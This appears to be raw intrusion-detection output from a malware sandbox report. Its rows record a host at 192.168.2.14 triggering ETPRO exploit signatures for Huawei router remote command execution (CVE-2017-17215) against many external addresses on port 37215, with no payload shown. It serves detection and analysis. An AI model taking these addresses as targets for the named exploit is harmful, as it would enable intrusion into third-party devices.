                                                        06/13/24-21:32:46.502060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095237215192.168.2.14156.134.63.168
                                                        06/13/24-21:32:25.996660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733637215192.168.2.14156.150.17.136
                                                        06/13/24-21:32:30.079711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4767437215192.168.2.14197.157.142.254
                                                        06/13/24-21:32:23.933902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4788437215192.168.2.1441.36.168.130
                                                        06/13/24-21:33:11.175131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448437215192.168.2.14156.208.14.148
                                                        06/13/24-21:32:21.800600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924237215192.168.2.14197.218.1.171
                                                        06/13/24-21:32:07.416757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906437215192.168.2.14197.215.14.191
                                                        06/13/24-21:33:13.210542TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3844037215192.168.2.14197.137.57.112
                                                        06/13/24-21:32:52.677156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183637215192.168.2.14156.82.1.215
                                                        06/13/24-21:32:01.238034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3718037215192.168.2.14197.28.31.212
                                                        06/13/24-21:33:04.990705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201237215192.168.2.14197.189.172.26
                                                        06/13/24-21:32:11.505652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862237215192.168.2.14197.115.116.124
                                                        06/13/24-21:32:50.610797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4589237215192.168.2.1441.117.204.122
                                                        06/13/24-21:32:23.835181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3821037215192.168.2.14156.252.77.195
                                                        06/13/24-21:33:17.306558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276437215192.168.2.14156.50.212.61
                                                        06/13/24-21:32:15.630211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4855837215192.168.2.1441.202.54.104
                                                        06/13/24-21:32:30.093818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865437215192.168.2.14156.36.152.112
                                                        06/13/24-21:32:03.297440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3606237215192.168.2.14197.151.164.204
                                                        06/13/24-21:32:17.678607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189437215192.168.2.1441.186.117.180
                                                        06/13/24-21:31:57.131126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266437215192.168.2.14156.247.199.134
                                                        06/13/24-21:32:58.844076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3309237215192.168.2.14197.91.53.152
                                                        06/13/24-21:33:15.275680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065237215192.168.2.1441.86.237.112
                                                        06/13/24-21:32:30.073932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4274637215192.168.2.14197.60.255.207
                                                        06/13/24-21:33:07.042279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5849637215192.168.2.1441.1.168.172
                                                        06/13/24-21:32:42.407702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5651037215192.168.2.1441.101.21.8
                                                        06/13/24-21:33:13.226899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4251037215192.168.2.14197.41.3.231
                                                        06/13/24-21:32:42.418205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057237215192.168.2.14197.14.50.120
                                                        06/13/24-21:32:42.422189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309037215192.168.2.1441.238.144.223
                                                        06/13/24-21:32:11.489024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462237215192.168.2.1441.130.52.18
                                                        06/13/24-21:32:40.354023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4538437215192.168.2.14156.223.219.241
                                                        06/13/24-21:32:36.247827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4699237215192.168.2.1441.3.108.11
                                                        06/13/24-21:32:32.153071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985437215192.168.2.14156.153.113.69
                                                        06/13/24-21:32:38.297522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4867837215192.168.2.1441.159.199.154
                                                        06/13/24-21:32:58.821993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968037215192.168.2.1441.98.86.212
                                                        06/13/24-21:32:23.830689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520237215192.168.2.14156.81.168.190
                                                        06/13/24-21:32:05.376332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187637215192.168.2.1441.107.162.238
                                                        06/13/24-21:33:13.211714TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654637215192.168.2.1441.103.99.60
                                                        06/13/24-21:33:15.253499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730237215192.168.2.14197.1.111.87
                                                        06/13/24-21:32:28.043184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3411637215192.168.2.14156.71.29.175
                                                        06/13/24-21:32:01.223382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883437215192.168.2.14156.63.58.63
                                                        06/13/24-21:32:19.726925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901437215192.168.2.14156.213.244.80
                                                        06/13/24-21:31:57.091597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414837215192.168.2.14197.253.168.147
                                                        06/13/24-21:32:09.455690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567237215192.168.2.14156.185.233.106
                                                        06/13/24-21:33:02.909644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5086637215192.168.2.14156.216.132.209
                                                        06/13/24-21:33:02.938151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183037215192.168.2.14197.90.95.149
                                                        06/13/24-21:32:01.221764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021837215192.168.2.1441.170.153.182
                                                        06/13/24-21:32:36.268871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868837215192.168.2.14156.110.130.102
                                                        06/13/24-21:32:42.423274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837037215192.168.2.14156.215.13.34
                                                        06/13/24-21:32:56.787976TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121837215192.168.2.14197.91.253.211
                                                        06/13/24-21:32:09.440403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706237215192.168.2.14197.3.248.190
                                                        06/13/24-21:32:32.164532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4759637215192.168.2.14156.176.65.102
                                                        06/13/24-21:32:36.244019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3813437215192.168.2.1441.34.129.18
                                                        06/13/24-21:32:44.474165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603237215192.168.2.1441.159.88.63
                                                        06/13/24-21:33:09.090814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968237215192.168.2.14156.250.226.112
                                                        06/13/24-21:33:02.910246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3469237215192.168.2.14197.13.223.14
                                                        06/13/24-21:33:13.228553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618037215192.168.2.14197.90.113.232
                                                        06/13/24-21:32:30.127966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797637215192.168.2.1441.174.141.139
                                                        06/13/24-21:32:42.406980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520837215192.168.2.14156.23.238.110
                                                        06/13/24-21:32:15.635232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287637215192.168.2.1441.27.109.85
                                                        06/13/24-21:32:19.727629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052037215192.168.2.1441.54.231.236
                                                        06/13/24-21:33:17.339777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155637215192.168.2.14197.58.230.135
                                                        06/13/24-21:32:07.401827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4846237215192.168.2.1441.124.106.15
                                                        06/13/24-21:33:09.128898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040037215192.168.2.14197.23.214.44
                                                        06/13/24-21:32:50.630237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414437215192.168.2.14156.19.170.108
                                                        06/13/24-21:32:23.834722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098637215192.168.2.1441.197.203.138
                                                        06/13/24-21:32:44.477088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3452237215192.168.2.14156.161.100.127
                                                        06/13/24-21:33:00.887608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481237215192.168.2.14156.47.26.56
                                                        06/13/24-21:33:09.130285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353237215192.168.2.14156.144.48.121
                                                        06/13/24-21:32:34.198903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6033437215192.168.2.14156.191.164.163
                                                        06/13/24-21:32:13.569230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5130237215192.168.2.14197.113.102.11
                                                        06/13/24-21:32:44.452161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4753837215192.168.2.14197.47.183.227
                                                        06/13/24-21:33:15.275870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211637215192.168.2.14197.139.97.108
                                                        06/13/24-21:32:21.801657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090237215192.168.2.14156.63.192.233
                                                        06/13/24-21:33:02.938022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5061437215192.168.2.1441.130.30.204
                                                        06/13/24-21:32:07.404070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046637215192.168.2.1441.75.88.207
                                                        06/13/24-21:32:32.154606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5805437215192.168.2.14156.244.213.53
                                                        06/13/24-21:32:44.474990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764437215192.168.2.14156.59.133.129
                                                        06/13/24-21:32:44.451807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3435237215192.168.2.14156.212.155.49
                                                        06/13/24-21:32:34.194748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520437215192.168.2.14197.59.44.126
                                                        06/13/24-21:33:07.055983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361437215192.168.2.1441.209.19.62
                                                        06/13/24-21:32:52.680528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205837215192.168.2.1441.171.49.228
                                                        06/13/24-21:32:36.243859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527637215192.168.2.14156.255.197.202
                                                        06/13/24-21:32:03.276140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3759637215192.168.2.1441.28.77.14
                                                        06/13/24-21:32:54.726513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5228037215192.168.2.14156.30.103.147
                                                        06/13/24-21:32:05.368983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4631837215192.168.2.1441.167.197.169
                                                        06/13/24-21:32:05.345419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4702437215192.168.2.14197.115.95.222
                                                        06/13/24-21:32:44.476249TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5528637215192.168.2.14156.202.38.168
                                                        06/13/24-21:32:01.223387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654437215192.168.2.14156.230.229.98
                                                        06/13/24-21:32:46.502018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5913437215192.168.2.14197.181.159.189
                                                        06/13/24-21:33:15.256617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5851437215192.168.2.14197.75.237.181
                                                        06/13/24-21:33:09.088671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4774837215192.168.2.14156.213.118.69
                                                        06/13/24-21:32:36.267764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923437215192.168.2.1441.248.179.28
                                                        06/13/24-21:33:02.913553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5959837215192.168.2.1441.181.189.134
                                                        06/13/24-21:33:13.227850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.14197.69.101.29
                                                        06/13/24-21:31:57.130261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240637215192.168.2.14156.127.171.55
                                                        06/13/24-21:32:07.417839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578437215192.168.2.14197.98.83.205
                                                        06/13/24-21:32:07.420167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198437215192.168.2.14197.94.170.23
                                                        06/13/24-21:32:19.751143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773837215192.168.2.14156.25.151.16
                                                        06/13/24-21:32:03.307055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713237215192.168.2.1441.216.212.177
                                                        06/13/24-21:32:25.995541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364837215192.168.2.14156.49.122.211
                                                        06/13/24-21:32:25.995350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4391837215192.168.2.14197.19.71.141
                                                        06/13/24-21:33:00.871282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129837215192.168.2.1441.51.56.108
                                                        06/13/24-21:33:17.309270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4174437215192.168.2.1441.34.160.57
                                                        06/13/24-21:32:52.658959TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327637215192.168.2.14197.107.16.164
                                                        06/13/24-21:33:13.230897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088237215192.168.2.1441.128.40.255
                                                        06/13/24-21:32:23.835477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431037215192.168.2.14197.207.44.145
                                                        06/13/24-21:32:01.241882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4696437215192.168.2.14156.231.28.116
                                                        06/13/24-21:32:30.077294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4254237215192.168.2.14197.42.75.93
                                                        06/13/24-21:32:58.840920TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113437215192.168.2.14197.168.244.26
                                                        06/13/24-21:33:09.107112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966437215192.168.2.14197.21.106.183
                                                        06/13/24-21:33:13.213019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114237215192.168.2.14197.191.184.193
                                                        06/13/24-21:33:02.914186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3550237215192.168.2.14197.243.26.228
                                                        06/13/24-21:32:17.672652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793237215192.168.2.14156.113.159.81
                                                        06/13/24-21:32:13.547164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4675037215192.168.2.1441.185.82.240
                                                        06/13/24-21:33:00.868792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3714437215192.168.2.1441.124.29.108
                                                        06/13/24-21:32:44.476607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832237215192.168.2.1441.218.76.72
                                                        06/13/24-21:33:11.160535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5443437215192.168.2.14197.209.122.49
                                                        06/13/24-21:33:09.091324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5892837215192.168.2.14197.45.33.41
                                                        06/13/24-21:32:01.240584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3426837215192.168.2.14197.46.116.68
                                                        06/13/24-21:32:30.074830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754837215192.168.2.14197.107.224.134
                                                        06/13/24-21:32:09.456538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603837215192.168.2.14156.0.244.44
                                                        06/13/24-21:32:09.440260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062437215192.168.2.14156.60.218.23
                                                        06/13/24-21:32:34.194670TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5954637215192.168.2.14197.203.42.34
                                                        06/13/24-21:32:52.654924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5995837215192.168.2.1441.73.15.35
                                                        06/13/24-21:32:25.970017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6067637215192.168.2.14156.9.153.222
                                                        06/13/24-21:32:28.048588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130237215192.168.2.1441.12.45.88
                                                        06/13/24-21:31:57.132744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432637215192.168.2.14197.26.36.220
                                                        06/13/24-21:32:19.729271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4989037215192.168.2.14156.186.90.121
                                                        06/13/24-21:33:15.270642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825837215192.168.2.14197.137.4.189
                                                        06/13/24-21:33:04.992652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857637215192.168.2.1441.70.228.234
                                                        06/13/24-21:32:28.027099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302037215192.168.2.14197.49.79.173
                                                        06/13/24-21:32:44.451047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5983437215192.168.2.14156.195.179.155
                                                        06/13/24-21:32:48.568127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4656637215192.168.2.14156.182.147.37
                                                        06/13/24-21:32:15.634313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5327637215192.168.2.14156.173.246.15
                                                        06/13/24-21:32:09.436421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3794437215192.168.2.14197.24.239.250
                                                        06/13/24-21:32:58.823357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687637215192.168.2.14156.167.252.110
                                                        06/13/24-21:32:36.248135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354437215192.168.2.1441.198.35.243
                                                        06/13/24-21:32:38.321699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5836437215192.168.2.14197.78.241.169
                                                        06/13/24-21:33:07.039415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954237215192.168.2.14156.140.107.52
                                                        06/13/24-21:32:17.694592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778637215192.168.2.1441.184.129.107
                                                        06/13/24-21:32:52.669252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4173437215192.168.2.1441.142.39.66
                                                        06/13/24-21:32:03.275209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463037215192.168.2.14197.125.218.39
                                                        06/13/24-21:33:09.107330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101037215192.168.2.1441.253.222.196
                                                        06/13/24-21:32:48.554653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5145037215192.168.2.14197.253.153.180
                                                        06/13/24-21:31:57.092356TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5438637215192.168.2.1441.239.49.185
                                                        06/13/24-21:32:42.420107TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410437215192.168.2.1441.162.233.201
                                                        06/13/24-21:32:30.079927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913437215192.168.2.14156.219.250.221
                                                        06/13/24-21:32:36.262789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5741637215192.168.2.1441.216.143.243
                                                        06/13/24-21:32:58.824686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470037215192.168.2.14156.233.112.62
                                                        06/13/24-21:32:54.724509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3564837215192.168.2.1441.115.79.149
                                                        06/13/24-21:32:32.150244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020237215192.168.2.14156.72.211.247
                                                        06/13/24-21:32:46.503987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4890037215192.168.2.14156.189.34.127
                                                        06/13/24-21:32:54.710120TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4230037215192.168.2.1441.170.228.236
                                                        06/13/24-21:32:23.832038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3668237215192.168.2.14197.32.239.184
                                                        06/13/24-21:32:42.418328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5953837215192.168.2.14197.51.123.50
                                                        06/13/24-21:32:32.154069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820237215192.168.2.14156.187.42.33
                                                        06/13/24-21:32:34.191233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4882837215192.168.2.14156.165.23.26
                                                        06/13/24-21:31:57.133853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016837215192.168.2.14156.88.160.161
                                                        06/13/24-21:32:05.347501TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457837215192.168.2.1441.35.122.26
                                                        06/13/24-21:32:15.609004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4579237215192.168.2.1441.29.131.7
                                                        06/13/24-21:32:17.693953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5030837215192.168.2.14197.47.148.70
                                                        06/13/24-21:33:09.091567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054037215192.168.2.1441.255.148.129
                                                        06/13/24-21:33:09.088446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5883637215192.168.2.14156.22.141.143
                                                        06/13/24-21:33:13.212123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768037215192.168.2.14197.220.88.121
                                                        06/13/24-21:32:05.348698TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658437215192.168.2.1441.77.18.170
                                                        06/13/24-21:32:11.486380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3331837215192.168.2.14156.41.225.17
                                                        06/13/24-21:32:46.502640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4593037215192.168.2.1441.82.232.66
                                                        06/13/24-21:32:50.612735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066037215192.168.2.14197.227.3.63
                                                        06/13/24-21:32:25.972742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565237215192.168.2.14197.16.170.75
                                                        06/13/24-21:32:46.528289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379637215192.168.2.14156.125.103.52
                                                        06/13/24-21:31:57.090152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644437215192.168.2.14197.133.36.111
                                                        06/13/24-21:32:32.166377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074437215192.168.2.1441.48.52.59
                                                        06/13/24-21:33:04.992052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3538837215192.168.2.1441.138.227.1
                                                        06/13/24-21:32:56.790190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5551437215192.168.2.1441.196.67.119
                                                        06/13/24-21:32:03.273604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660437215192.168.2.14197.242.2.51
                                                        06/13/24-21:32:58.822738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768437215192.168.2.14197.201.113.126
                                                        06/13/24-21:32:30.097800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5785637215192.168.2.1441.42.5.219
                                                        06/13/24-21:32:07.401431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022437215192.168.2.14156.210.37.104
                                                        06/13/24-21:32:09.455794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891637215192.168.2.14197.76.152.84
                                                        06/13/24-21:32:25.994620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946237215192.168.2.1441.227.57.220
                                                        06/13/24-21:33:15.276066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280637215192.168.2.14156.97.149.252
                                                        06/13/24-21:32:36.245758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3456637215192.168.2.14156.22.14.9
                                                        06/13/24-21:32:36.246172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569237215192.168.2.14197.250.187.74
                                                        06/13/24-21:32:23.830373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831637215192.168.2.14156.89.146.224
                                                        06/13/24-21:33:15.259155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157837215192.168.2.14156.68.188.52
                                                        06/13/24-21:32:30.125864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5766237215192.168.2.14197.4.254.95
                                                        06/13/24-21:33:00.867990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915637215192.168.2.14197.216.160.38
